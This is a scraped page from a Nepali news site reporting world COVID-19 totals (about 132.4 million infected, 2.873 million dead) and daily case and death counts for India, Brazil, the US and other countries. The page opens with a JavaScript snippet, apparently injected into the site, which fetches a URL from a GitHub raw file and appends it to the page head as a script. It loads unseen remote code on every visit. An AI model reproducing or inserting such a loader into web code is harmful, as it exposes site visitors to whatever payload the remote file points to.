;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); विश्वमा कोरोनाबाट १३ करोड २४ लाख संक्रमित‚ २८ लाख ७३ हजारको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • विश्वमा कोरोनाबाट १३ करोड २४ लाख संक्रमित‚ २८ लाख ७३ हजारको मृत्यु
अन्तर्राष्ट्रिय

विश्वमा कोरोनाबाट १३ करोड २४ लाख संक्रमित‚ २८ लाख ७३ हजारको मृत्यु

चैत २४,

छिमेकी देश भारतमा गत २४ घण्टामा साढे ९६ हजारभन्दा बढीमा कोरोना भाइरस संक्रमण पुष्टि भएको छ। यस अवधिमा त्यहाँ ४४५ जना संक्रमितको मृत्यु भएको छ।

यस्तै‚ ब्राजिलमा पछिल्लो २४ घण्टामा ३८ हजार जनामा संक्रमण पुष्टि भए पनि यसअवधिमा त्यहाँ ज्यान गुमाउने संक्रमितको संख्या अन्य देशको तुलनामा सबैभन्दा बढी रहेको छ। ब्राजिलमा पछिल्लो २४ घण्टामा १ हजार ६२३ जना संक्रमितको मृत्यु भएको छ।

अमेरिकामा थप ४७ हजार १०० जनामा संक्रमण देखिदा ४०४ जनाको मृत्यु भएको छ। यसैगरी टर्कीमा थप ४२ हजार ५००, अर्जेन्टिना र इरानमा समान १३/१३ हजार, कोलम्बिया र युक्रेनमा १०/१० हजार जना थप संक्रमित फेला परेका छन्।

यससँगै विश्वभर हालसम्म कोरोना भाइरसबाट संक्रमित हुनेका संख्या १३ करोड २३ लाख ९० हजार २१४ पुगेको छ भने हालसम्म विश्वभर २८ लाख ७३ हजारभन्दा धेरैजना संक्रमितको मृत्यु भइसकेको छ।

फेसबुक प्रतिक्रियाहरु